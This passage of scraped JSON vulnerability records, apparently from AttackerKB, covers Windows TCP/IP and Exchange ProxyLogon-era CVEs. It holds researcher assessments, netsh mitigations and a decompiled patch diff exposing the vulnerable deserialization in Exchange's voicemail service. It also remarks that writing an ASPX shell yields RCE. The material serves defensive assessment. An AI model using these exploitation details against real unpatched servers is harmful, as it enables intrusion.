"AKB:1BA7DC74-F17D-4C34-9A6C-2F6B39787AA2", "href": "https://attackerkb.com/topics/Sw8H0fbJ9O/multiple-microsoft-exchange-zero-day-vulnerabilities---proxylogon-exploit-chain", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-20T20:10:51", "description": "Windows TCP/IP Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-24074.\n\n \n**Recent assessments:** \n \n**bwatters-r7** at February 09, 2021 9:42pm UTC reported:\n\nThis remains a spectacularly new vulnerability with little documentation associated with it beyond Microsoft\u2019s blog here: <https://msrc-blog.microsoft.com/2021/02/09/multiple-security-updates-affecting-tcp-ip/> \nIn the blog, this is a remote code execution vulnerability reported as associated with IPv6 packet reassembly. According to the vulnerability report here: <https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-24094>, there is a patch, and you can create a firewall rule on Windows host-based firewalls to block an attack with the command `Netsh int ipv6 set global reassemblylimit=0` to block packet reassembly. THIS MAY AFFECT SOME NETWORK TRAFFIC. \nA second denial of service vulnerability (CVE-2021-24086) also associated with IPv6 fragment reassembly is mitigated with the same command. \nAs pure speculation, this vulnerability might be associated with memory corruption through improper length reporting, such that when packets are reassembled in memory, they are placed in a buffer of insufficient size to store them. Should that be the case, this would most likely be a heap vulnerability, and like other heap vulnerabilities before it like eternalblue, bluekeep, and dejablue, it will be a real pain to get to work on a regular basis or as a worm-able exploit.\n\nAssessed Attacker Value: 1 \nAssessed Attacker Value: 1Assessed Attacker Value: 1\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-02-25T00:00:00", "type": "attackerkb", "title": "CVE-2021-24094", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24074", "CVE-2021-24086", "CVE-2021-24094"], "modified": "2021-03-03T00:00:00", "id": "AKB:5ACC27EC-B7F2-405F-B3D6-009D27A1C386", "href": "https://attackerkb.com/topics/MKqjeN2Z1F/cve-2021-24094", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-20T20:09:57", "description": "Windows TCP/IP Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-24094.\n\n \n**Recent assessments:** \n \n**bwatters-r7** at February 09, 2021 9:16pm UTC reported:\n\nThis remains a spectacularly new vulnerability with little documentation associated with it beyond Microsoft\u2019s blog here: <https://msrc-blog.microsoft.com/2021/02/09/multiple-security-updates-affecting-tcp-ip/> \nIn the blog, they report that this vulnerability is associated with IPv4 source routing, but the default blocks against source routing on Windows are not suffcient, as the default configuration allows a Windows system to process ICMP requests with source routing. \nReported as a remote code execution vulnerability, Microsoft claims that it will likely not be weaponized for that purpose quickly, though it might see a DoS exploit in the near-term. \nThere is a patch, but also, the mitigations provided in the guidance (<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-24074>) involve the creation of a rule blocking source forwarding from the built-in firewall: \n`netsh int ipv4 set global sourceroutingbehavior=drop` \nSuch a change in the firewall configuration can be deployed by group policy and would not require a reboot. The rule could also be deployed to infrastructure firewalls, but would then only protect against attacks that took place across the firewall; the rules would need to be set on all Windows system host-based firewalls to protect against lateral movement within a network.\n\n**gwillcox-r7** at April 23, 2021 8:24pm UTC reported:\n\nThis remains a spectacularly new vulnerability with little documentation associated with it beyond Microsoft\u2019s blog here: <https://msrc-blog.microsoft.com/2021/02/09/multiple-security-updates-affecting-tcp-ip/> \nIn the blog, they report that this vulnerability is associated with IPv4 source routing, but the default blocks against source routing on Windows are not suffcient, as the default configuration allows a Windows system to process ICMP requests with source routing. \nReported as a remote code execution vulnerability, Microsoft claims that it will likely not be weaponized for that purpose quickly, though it might see a DoS exploit in the near-term. \nThere is a patch, but also, the mitigations provided in the guidance (<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-24074>) involve the creation of a rule blocking source forwarding from the built-in firewall: \n`netsh int ipv4 set global sourceroutingbehavior=drop` \nSuch a change in the firewall configuration can be deployed by group policy and would not require a reboot. The rule could also be deployed to infrastructure firewalls, but would then only protect against attacks that took place across the firewall; the rules would need to be set on all Windows system host-based firewalls to protect against lateral movement within a network.\n\nAssessed Attacker Value: 2 \nAssessed Attacker Value: 2Assessed Attacker Value: 2\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-02-25T00:00:00", "type": "attackerkb", "title": "CVE-2021-24074", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24074", "CVE-2021-24086", "CVE-2021-24094"], "modified": "2021-03-03T00:00:00", "id": "AKB:4BB453DC-4A7E-4FAF-832B-C5079208A3DA", "href": "https://attackerkb.com/topics/Vcp83dpFgQ/cve-2021-24074", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-11-03T20:17:54", "description": "Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-26412, CVE-2021-26854, CVE-2021-26855, CVE-2021-26857, CVE-2021-27065, CVE-2021-27078.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-03T00:00:00", "type": "attackerkb", "title": "CVE-2021-26858", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26412", "CVE-2021-26854", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-27078"], "modified": "2021-07-27T00:00:00", "id": "AKB:4C137002-9580-4593-83DB-D4E636E1AEFB", "href": "https://attackerkb.com/topics/TFFtD6XA8z/cve-2021-26858", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-12-11T15:33:28", "description": "Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-26412, CVE-2021-26854, CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27078.\n\n \n**Recent assessments:** \n \n**wvu-r7** at March 10, 2021 7:13am UTC reported:\n\nWhen used with [CVE-2021-26855](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855>), an unauthenticated SSRF, [CVE-2021-27065](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27065>) yields unauthed, `SYSTEM`-level RCE against a vulnerable Exchange Server. On its own, exploiting this vulnerability requires access to the [EAC/ECP interface](<https://docs.microsoft.com/en-us/exchange/architecture/client-access/exchange-admin-center?view=exchserver-2019>), which is a privileged and authenticated web interface.\n\nI was able to identify the relevant endpoints a few days ago using a combination of patch analysis and manual testing, and I successfully wrote an arbitrary file (sans SSRF) to the target\u2019s filesystem (UNC path). Ironically, I was looking at the virtual directory settings for [EWS](<https://docs.microsoft.com/en-us/exchange/client-developer/web-service-reference/ews-reference-for-exchange>), but \u201cOAB\u201d caught my eye due to its published IOCs. ([OAB](<https://docs.microsoft.com/en-us/exchange/email-addresses-and-address-books/offline-address-books/offline-address-books?view=exchserver-2019>) is Microsoft\u2019s implementation of offline address books in Exchange.)\n\n\n\nWriting an ASPX shell is the easiest way to achieve RCE using CVE-2021-27065, so make sure to look for filesystem IOCs. These IOCs are [well-documented](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>) by Microsoft and other entities. Bear in mind that attackers will try to use clever or randomized filenames to evade detection.\n\n**cdelafuente-r7** at March 24, 2021 3:26pm UTC reported:\n\nWhen used with [CVE-2021-26855](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855>), an unauthenticated SSRF, [CVE-2021-27065](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27065>) yields unauthed, `SYSTEM`-level RCE against a vulnerable Exchange Server. On its own, exploiting this vulnerability requires access to the [EAC/ECP interface](<https://docs.microsoft.com/en-us/exchange/architecture/client-access/exchange-admin-center?view=exchserver-2019>), which is a privileged and authenticated web interface.\n\nI was able to identify the relevant endpoints a few days ago using a combination of patch analysis and manual testing, and I successfully wrote an arbitrary file (sans SSRF) to the target\u2019s filesystem (UNC path). Ironically, I was looking at the virtual directory settings for [EWS](<https://docs.microsoft.com/en-us/exchange/client-developer/web-service-reference/ews-reference-for-exchange>), but \u201cOAB\u201d caught my eye due to its published IOCs. ([OAB](<https://docs.microsoft.com/en-us/exchange/email-addresses-and-address-books/offline-address-books/offline-address-books?view=exchserver-2019>) is Microsoft\u2019s implementation of offline address books in Exchange.)\n\n\n\nWriting an ASPX shell is the easiest way to achieve RCE using CVE-2021-27065, so make sure to look for filesystem IOCs. These IOCs are [well-documented](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>) by Microsoft and other entities. Bear in mind that attackers will try to use clever or randomized filenames to evade detection.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 4\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-03T00:00:00", "type": "attackerkb", "title": "CVE-2021-27065", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26412", "CVE-2021-26854", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-27078"], "modified": "2021-07-27T00:00:00", "id": "AKB:BD645B28-C99E-42EA-A606-832F4F534945", "href": "https://attackerkb.com/topics/lLMDUaeKSn/cve-2021-27065", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-27T02:14:28", "description": "Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-26412, CVE-2021-26854, CVE-2021-26855, CVE-2021-26858, CVE-2021-27065, CVE-2021-27078.\n\n \n**Recent assessments:** \n \n**wvu-r7** at March 03, 2021 6:59pm UTC reported:\n\nAs per [Microsoft\u2019s blog post](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>) on Exchange Server 0day use by the HAFNIUM actors, [CVE-2021-26857](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26857>) is a deserialization vulnerability in Exchange Server\u2019s Unified Messaging (voicemail) service. Exploiting the vulnerability reportedly requires admin access or chaining with another vuln (likely [CVE-2021-26855](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855>)), but successful exploitation results in RCE as the `SYSTEM` account. This vulnerability would ideally be combined with an [auth bypass](<https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/>), which CVE-2021-26855 may very well provide.\n\nI took a look at CVE-2021-26857 last night and came up with the following patch diff:\n \n \n --- exchange.unpatched/Microsoft.Exchange.UM.UMCore/UMCore/PipelineContext.cs\t2021-03-02 19:54:18.000000000 -0600\n +++ exchange.patched/Microsoft.Exchange.UM.UMCore/UMCore/PipelineContext.cs\t2021-03-02 19:55:19.000000000 -0600\n @@ -1,742 +1,886 @@\n \ufeffusing System;\n +using System.Collections.Generic;\n using System.Globalization;\n using System.IO;\n +using System.Runtime.Serialization;\n +using Microsoft.Exchange.Compliance.Serialization.Formatters;\n +using Microsoft.Exchange.Data;\n +using Microsoft.Exchange.Data.Common;\n using Microsoft.Exchange.Data.Directory;\n using Microsoft.Exchange.Data.Directory.Recipient;\n using Microsoft.Exchange.Data.Directory.SystemConfiguration;\n using Microsoft.Exchange.Data.Storage;\n using Microsoft.Exchange.Diagnostics;\n using Microsoft.Exchange.Diagnostics.Components.UnifiedMessaging;\n using Microsoft.Exchange.ExchangeSystem;\n using Microsoft.Exchange.TextProcessing.Boomerang;\n using Microsoft.Exchange.UM.UMCommon;\n +using Microsoft.Mapi;\n \n namespace Microsoft.Exchange.UM.UMCore\n {\n \tinternal abstract class PipelineContext : DisposableBase, IUMCreateMessage\n \t{\n \t\tinternal PipelineContext()\n \t\t{\n \t\t}\n \n \t\tinternal PipelineContext(SubmissionHelper helper)\n \t\t{\n \t\t\tbool flag = false;\n \t\t\ttry\n \t\t\t{\n \t\t\t\tthis.helper = helper;\n \t\t\t\tthis.cultureInfo = new CultureInfo(helper.CultureInfo);\n \t\t\t\tflag = true;\n \t\t\t}\n \t\t\tfinally\n \t\t\t{\n \t\t\t\tif (!flag)\n \t\t\t\t{\n \t\t\t\t\tthis.Dispose();\n \t\t\t\t}\n \t\t\t}\n \t\t}\n \n \t\tpublic MessageItem MessageToSubmit\n \t\t{\n \t\t\tget\n \t\t\t{\n \t\t\t\treturn this.messageToSubmit;\n \t\t\t}\n \t\t\tprotected set\n \t\t\t{\n \t\t\t\tthis.messageToSubmit = value;\n \t\t\t}\n \t\t}\n \n \t\tpublic string MessageID\n \t\t{\n \t\t\tget\n \t\t\t{\n \t\t\t\treturn this.messageID;\n \t\t\t}\n \t\t\tprotected set\n \t\t\t{\n \t\t\t\tthis.messageID = value;\n \t\t\t}\n \t\t}\n \n \t\tinternal abstract Pipeline Pipeline { get; }\n \n \t\tinternal Microsoft.Exchange.UM.UMCommon.PhoneNumber CallerId\n \t\t{\n \t\t\tget\n \t\t\t{\n \t\t\t\treturn this.helper.CallerId;\n \t\t\t}\n \t\t}\n \n \t\tinternal Guid TenantGuid\n \t\t{\n \t\t\tget\n \t\t\t{\n \t\t\t\treturn this.helper.TenantGuid;\n \t\t\t}\n \t\t}\n \n \t\tinternal int ProcessedCount\n \t\t{\n \t\t\tget\n \t\t\t{\n \t\t\t\treturn this.processedCount;\n \t\t\t}\n \t\t}\n \n \t\tinternal ExDateTime SentTime\n \t\t{\n \t\t\tget\n \t\t\t{\n \t\t\t\treturn this.sentTime;\n \t\t\t}\n \t\t\tset\n \t\t\t{\n \t\t\t\tthis.sentTime = value;\n \t\t\t}\n \t\t}\n \n \t\tinternal CultureInfo CultureInfo\n \t\t{\n \t\t\tget\n \t\t\t{\n \t\t\t\treturn this.cultureInfo;\n \t\t\t}\n \t\t}\n \n \t\tprotected internal string HeaderFileName\n \t\t{\n \t\t\tget\n \t\t\t{\n \t\t\t\tif (string.IsNullOrEmpty(this.headerFileName))\n \t\t\t\t{\n \t\t\t\t\tGuid guid = Guid.NewGuid();\n \t\t\t\t\tthis.headerFileName = Path.Combine(Utils.VoiceMailFilePath, guid.ToString() + \".txt\");\n \t\t\t\t}\n \t\t\t\treturn this.headerFileName;\n \t\t\t}\n \t\t\tprotected set\n \t\t\t{\n \t\t\t\tthis.headerFileName = value;\n \t\t\t}\n \t\t}\n \n \t\tprotected internal string CallerAddress\n \t\t{\n \t\t\tget\n \t\t\t{\n \t\t\t\treturn this.helper.CallerAddress;\n \t\t\t}\n \t\t\tprotected set\n \t\t\t{\n \t\t\t\tthis.helper.CallerAddress = value;\n \t\t\t}\n \t\t}\n \n \t\tprotected internal string CallerIdDisplayName\n \t\t{\n \t\t\tget\n \t\t\t{\n \t\t\t\treturn this.helper.CallerIdDisplayName;\n \t\t\t}\n \t\t\tprotected set\n \t\t\t{\n \t\t\t\tthis.helper.CallerIdDisplayName = value;\n \t\t\t}\n \t\t}\n \n \t\tprotected internal string MessageType\n \t\t{\n \t\t\tinternal get\n \t\t\t{\n \t\t\t\treturn this.messageType;\n \t\t\t}\n \t\t\tset\n \t\t\t{\n \t\t\t\tthis.messageType = value;\n \t\t\t}\n \t\t}\n \n \t\tpublic virtual void PrepareUnProtectedMessage()\n \t\t{\n \t\t\tCallIdTracer.TraceDebug(ExTraceGlobals.VoiceMailTracer, this.GetHashCode(), \"PipelineContext:PrepareUnProtectedMessage.\", Array.Empty<object>());\n \t\t\tusing (DisposeGuard disposeGuard = default(DisposeGuard))\n \t\t\t{\n \t\t\t\tthis.messageToSubmit = MessageItem.CreateInMemory(StoreObjectSchema.ContentConversionProperties);\n \t\t\t\tdisposeGuard.Add<MessageItem>(this.messageToSubmit);\n \t\t\t\tthis.SetMessageProperties();\n \t\t\t\tdisposeGuard.Success();\n \t\t\t}\n \t\t}\n \n \t\tpublic virtual void PrepareProtectedMessage()\n \t\t{\n \t\t\tthrow new InvalidOperationException();\n \t\t}\n \n \t\tpublic virtual void PrepareNDRForFailureToGenerateProtectedMessage()\n \t\t{\n \t\t\tthrow new InvalidOperationException();\n \t\t}\n \n \t\tpublic virtual PipelineDispatcher.WIThrottleData GetThrottlingData()\n \t\t{\n \t\t\treturn new PipelineDispatcher.WIThrottleData\n \t\t\t{\n \t\t\t\tKey = this.GetMailboxServerId(),\n \t\t\t\tRecipientId = this.GetRecipientIdForThrottling(),\n \t\t\t\tWorkItemType = PipelineDispatcher.ThrottledWorkItemType.NonCDRWorkItem\n \t\t\t};\n \t\t}\n \n \t\tpublic virtual void PostCompletion()\n \t\t{\n \t\t\tCallIdTracer.TraceDebug(ExTraceGlobals.VoiceMailTracer, 0, \"PipelineContext - Deleting header file '{0}'\", new object[]\n \t\t\t{\n \t\t\t\tthis.headerFileName\n \t\t\t});\n \t\t\tUtil.TryDeleteFile(this.headerFileName);\n \t\t}\n \n \t\tinternal static PipelineContext FromHeaderFile(string headerFile)\n \t\t{\n \t\t\tPipelineContext pipelineContext = null;\n \t\t\tPipelineContext result;\n \t\t\ttry\n \t\t\t{\n \t\t\t\tContactInfo contactInfo = null;\n \t\t\t\tstring text = null;\n \t\t\t\tint num = 0;\n \t\t\t\tExDateTime exDateTime = default(ExDateTime);\n \t\t\t\tstring text2 = null;\n \t\t\t\tSubmissionHelper submissionHelper = new SubmissionHelper();\n \t\t\t\tuint num2;\n \t\t\t\tusing (StreamReader streamReader = File.OpenText(headerFile))\n \t\t\t\t{\n \t\t\t\t\tstring text3;\n \t\t\t\t\twhile ((text3 = streamReader.ReadLine()) != null)\n \t\t\t\t\t{\n \t\t\t\t\t\tstring[] array = text3.Split(\" : \".ToCharArray(), 2, StringSplitOptions.RemoveEmptyEntries);\n \t\t\t\t\t\tif (array != null && array.Length == 2)\n \t\t\t\t\t\t{\n \t\t\t\t\t\t\tstring text4 = array[0];\n \t\t\t\t\t\t\tnum2 = <PrivateImplementationDetails>.ComputeStringHash(text4);\n \t\t\t\t\t\t\tif (num2 <= 872212143U)\n \t\t\t\t\t\t\t{\n \t\t\t\t\t\t\t\tif (num2 <= 134404218U)\n \t\t\t\t\t\t\t\t{\n \t\t\t\t\t\t\t\t\tif (num2 != 77294025U)\n \t\t\t\t\t\t\t\t\t{\n \t\t\t\t\t\t\t\t\t\tif (num2 != 111122938U)\n \t\t\t\t\t\t\t\t\t\t{\n -\t\t\t\t\t\t\t\t\t\t\tif (num2 == 134404218U)\n +\t\t\t\t\t\t\t\t\t\t\tif (num2 != 134404218U)\n \t\t\t\t\t\t\t\t\t\t\t{\n -\t\t\t\t\t\t\t\t\t\t\t\tif (text4 == \"ProcessedCount\")\n -\t\t\t\t\t\t\t\t\t\t\t\t{\n -\t\t\t\t\t\t\t\t\t\t\t\t\tnum = Convert.ToInt32(array[1], CultureInfo.InvariantCulture) + 1;\n -\t\t\t\t\t\t\t\t\t\t\t\t\tcontinue;\n -\t\t\t\t\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\t\t\t\t\tgoto IL_409;\n +\t\t\t\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\t\t\t\tif (!(text4 == \"ProcessedCount\"))\n +\t\t\t\t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\t\t\t\tgoto IL_409;\n \t\t\t\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\t\t\t\tnum = Convert.ToInt32(array[1], CultureInfo.InvariantCulture) + 1;\n +\t\t\t\t\t\t\t\t\t\t\tcontinue;\n \t\t\t\t\t\t\t\t\t\t}\n -\t\t\t\t\t\t\t\t\t\telse if (text4 == \"RecipientObjectGuid\")\n +\t\t\t\t\t\t\t\t\t\telse\n \t\t\t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\t\t\tif (!(text4 == \"RecipientObjectGuid\"))\n +\t\t\t\t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\t\t\t\tgoto IL_409;\n +\t\t\t\t\t\t\t\t\t\t\t}\n \t\t\t\t\t\t\t\t\t\t\tsubmissionHelper.RecipientObjectGuid = new Guid(array[1]);\n \t\t\t\t\t\t\t\t\t\t\tcontinue;\n \t\t\t\t\t\t\t\t\t\t}\n \t\t\t\t\t\t\t\t\t}\n -\t\t\t\t\t\t\t\t\telse if (text4 == \"CallerNAme\")\n +\t\t\t\t\t\t\t\t\telse\n \t\t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\t\tif (!(text4 == \"CallerNAme\"))\n +\t\t\t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\t\t\tgoto IL_409;\n +\t\t\t\t\t\t\t\t\t\t}\n \t\t\t\t\t\t\t\t\t\tsubmissionHelper.CallerName = array[1];\n \t\t\t\t\t\t\t\t\t\tcontinue;\n \t\t\t\t\t\t\t\t\t}\n \t\t\t\t\t\t\t\t}\n \t\t\t\t\t\t\t\telse if (num2 <= 507978139U)\n \t\t\t\t\t\t\t\t{\n \t\t\t\t\t\t\t\t\tif (num2 != 152414519U)\n \t\t\t\t\t\t\t\t\t{\n -\t\t\t\t\t\t\t\t\t\tif (num2 == 507978139U)\n +\t\t\t\t\t\t\t\t\t\tif (num2 != 507978139U)\n \t\t\t\t\t\t\t\t\t\t{\n -\t\t\t\t\t\t\t\t\t\t\tif (text4 == \"RecipientName\")\n -\t\t\t\t\t\t\t\t\t\t\t{\n -\t\t\t\t\t\t\t\t\t\t\t\tsubmissionHelper.RecipientName = array[1];\n -\t\t\t\t\t\t\t\t\t\t\t\tcontinue;\n -\t\t\t\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\t\t\t\tgoto IL_409;\n \t\t\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\t\t\tif (!(text4 == \"RecipientName\"))\n +\t\t\t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\t\t\tgoto IL_409;\n +\t\t\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\t\t\tsubmissionHelper.RecipientName = array[1];\n +\t\t\t\t\t\t\t\t\t\tcontinue;\n \t\t\t\t\t\t\t\t\t}\n -\t\t\t\t\t\t\t\t\telse if (text4 == \"ContactInfo\")\n +\t\t\t\t\t\t\t\t\telse\n \t\t\t\t\t\t\t\t\t{\n -\t\t\t\t\t\t\t\t\t\tcontactInfo = (CommonUtil.Base64Deserialize(array[1]) as ContactInfo);\n -\t\t\t\t\t\t\t\t\t\tcontinue;\n +\t\t\t\t\t\t\t\t\t\tif (!(text4 == \"ContactInfo\"))\n +\t\t\t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\t\t\tgoto IL_409;\n +\t\t\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\t\t\tException ex = null;\n +\t\t\t\t\t\t\t\t\t\ttry\n +\t\t\t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\t\t\ttry\n +\t\t\t\t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\t\t\t\tusing (MemoryStream memoryStream = new MemoryStream(Convert.FromBase64String(array[1])))\n +\t\t\t\t\t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\t\t\t\t\tcontactInfo = (ContactInfo)TypedBinaryFormatter.DeserializeObject(memoryStream, PipelineContext.contactInfoDeserializationAllowList, null, true);\n +\t\t\t\t\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\t\t\t\tcatch (ArgumentNullException ex)\n +\t\t\t\t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\t\t\t\tcatch (SerializationException ex)\n +\t\t\t\t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\t\t\t\tcatch (Exception ex)\n +\t\t\t\t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\t\t\t\tcontinue;\n +\t\t\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\t\t\tfinally\n +\t\t\t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\t\t\tif (ex != null)\n +\t\t\t\t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\t\t\t\tCallIdTracer.TraceDebug(ExTraceGlobals.VoiceMailTracer, 0, \"Failed to get contactInfo from header file {0} with Error={1}\", new object[]\n +\t\t\t\t\t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\t\t\t\t\theaderFile,\n +\t\t\t\t\t\t\t\t\t\t\t\t\tex\n +\t\t\t\t\t\t\t\t\t\t\t\t});\n +\t\t\t\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\t\t\t}\n \t\t\t\t\t\t\t\t\t}\n \t\t\t\t\t\t\t\t}\n \t\t\t\t\t\t\t\telse if (num2 != 707084238U)\n \t\t\t\t\t\t\t\t{\n -\t\t\t\t\t\t\t\t\tif (num2 == 872212143U)\n +\t\t\t\t\t\t\t\t\tif (num2 != 872212143U)\n \t\t\t\t\t\t\t\t\t{\n -\t\t\t\t\t\t\t\t\t\tif (text4 == \"CallerId\")\n -\t\t\t\t\t\t\t\t\t\t{\n -\t\t\t\t\t\t\t\t\t\t\tsubmissionHelper.CallerId = Microsoft.Exchange.UM.UMCommon.PhoneNumber.Parse(array[1]);\n -\t\t\t\t\t\t\t\t\t\t\tcontinue;\n -\t\t\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\t\t\tgoto IL_409;\n \t\t\t\t\t\t\t\t\t}\n +\t\t\t\t\t\t\t\t\tif (!(text4 == \"CallerId\"))\n +\t\t\t\t\t\t\t\t\t{\n +\t\t\t\t\t\t\t\t\t\tgoto IL_409;\n +\t\t\t\t\t\t\t\t\t}\n 